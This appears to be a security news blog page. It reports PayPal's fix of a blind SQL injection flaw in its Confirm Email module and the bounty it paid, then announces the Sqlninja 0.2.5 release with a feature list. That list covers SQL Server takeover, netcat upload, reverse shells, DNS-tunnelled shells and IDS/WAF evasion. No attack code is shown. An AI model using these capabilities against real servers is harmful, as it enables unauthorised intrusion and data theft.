June 14, 2021

PayPal fixes a SQL injection vulnerability, pays researcher $3,000 reward for discovery

paypal-logo(LiveHacking.Com) – PayPal has paid out $3000 in reward money to a security researcher who found and reported an SQL injection vulnerability.  The payout, which comes under PayPal’s bounty program, went to researchers at Vulnerability Laboratory who discovered a blind SQL Injection vulnerability in the official Paypal website.

According to an advisory sent to the Full Disclosure security mailing list, the vulnerability allows remote attackers to inject SQL commands on the affected application dbms. The vulnerability is located in the Confirm Email module with the bound vulnerable id input field.

By exploiting the vulnerability  the injected SQL command is executed when the Confirm Email module reloads the page. To exploit the vulnerability a normal, low-privileged user account is required on PayPal.

Although the posting included a proof of concept, the underlying problem was fixed by PayPal within a very short amount of time once the vulnerability was discovered.  This all happened on 12th January 2013 and there is no evidence that the vulnerability was actually exploited in the wild.

Reward schemes for finding security related bugs have become common in the security industry with companies like Google and Facebook paying out substantial rewards to verifiable vulnerabilities in their software. Google recently announced its third Pwnium competition—Pwnium 3 which will  focus on Chrome OS. The search giant is making available up to $3.14159 million USD in rewards for demonstrable attacks against a base (WiFi) model of the Samsung Series 5 550 Chromebook, running the latest stable version of Chrome OS.

Since PayPal handles millions of dollars of transactions per day it is important that it has this extra level of help from ethical hackers, however as you can imagine the company doesn’t publicize any vulnerabilities found!

Sqlninja 0.2.5 Released

Sqlninja 0.2.5 has been released. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server. With reference to its project website, its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Sqlninja Features:

  • Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
  • Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)
  • Privilege escalation to sysadmin group if ‘sa’ password has been found
  • Creation of a custom xp_cmdshell if the original one has been removed
  • Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
  • TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
  • Direct and reverse bindshell, both TCP and UDP
  • DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
  • Evasion techniques to confuse a few IDS/IPS/WAF
  • Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
  • Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping


In order to use sqlninja, the following Perl modules need to be present:

  • NetPacket
  • Net-Pcap
  • Net-DNS
  • Net-RawIP
  • IO-Socket-SSL

You will also need the Metasploit Framework 3 on your box to use the metasploit attack mode, and also a VNC client if you use the VNC payload.

More Information & download links:

  1. Demo Video
  2. Project Documentation
  3. Download Page